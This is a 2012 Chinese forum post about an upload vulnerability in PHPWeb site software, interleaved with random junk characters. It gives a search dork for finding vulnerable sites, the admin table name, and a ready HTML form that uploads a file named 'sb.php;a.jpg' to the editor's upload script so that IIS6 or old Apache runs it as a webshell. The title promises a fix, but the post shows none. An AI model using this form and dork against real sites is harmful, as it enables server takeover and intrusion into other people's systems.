找回密码
 立即注册
查看: 2996|回复: 0
打印 上一主题 下一主题

phpweb成品网站全版本通杀注入漏洞及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:52:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
关键字:inurl:webmall/detail.php?id9 ~: X* Y+ j% ~2 B
( d$ V7 b$ A! j4 z0 O1 q$ _: ~6 j
数据表:pwn_base_admin
. U. }! ?7 S9 p! M) O 0 L  c: r5 Q1 A2 M
关于拿shell
0 a1 |4 k1 [0 ]$ U
: |# }% ?: C+ u( r  ]% A6 U首先登录后台admin.php8 X% P% c5 y  R6 X
  W$ n; m' K1 \4 Z- }
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
+ t7 k, u/ s, B换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
4 z0 u1 C/ _5 f4 J0 w/ v然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的( b$ L& P" y* k4 z- H/ d  ^
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
( P5 K0 g. K* }! P9 Y6 v, @- l<input type="text" name="fileName" value="sb.php;a.jpg" />
0 Y. C7 K0 E0 {7 i<input type="hidden" name="attachPath" value="news/pics/" /> 7 ?$ r( o1 q, c0 o- o+ P
<input type="file" name="fileData" size="14" /></td>
# A6 {0 }0 ~  b& t<input type="submit" name="button" value="确定" />
. `6 }6 O4 \2 t+ |2 P0 e</form>
$ R& a2 O8 h7 B* F2 u% H
" m1 z- E3 v" b- n  d! g' D首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
3 R% F# V5 c7 r+ Q, D+ `# N& [
( S- b7 m- B- [4 Q+ g/ u7 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表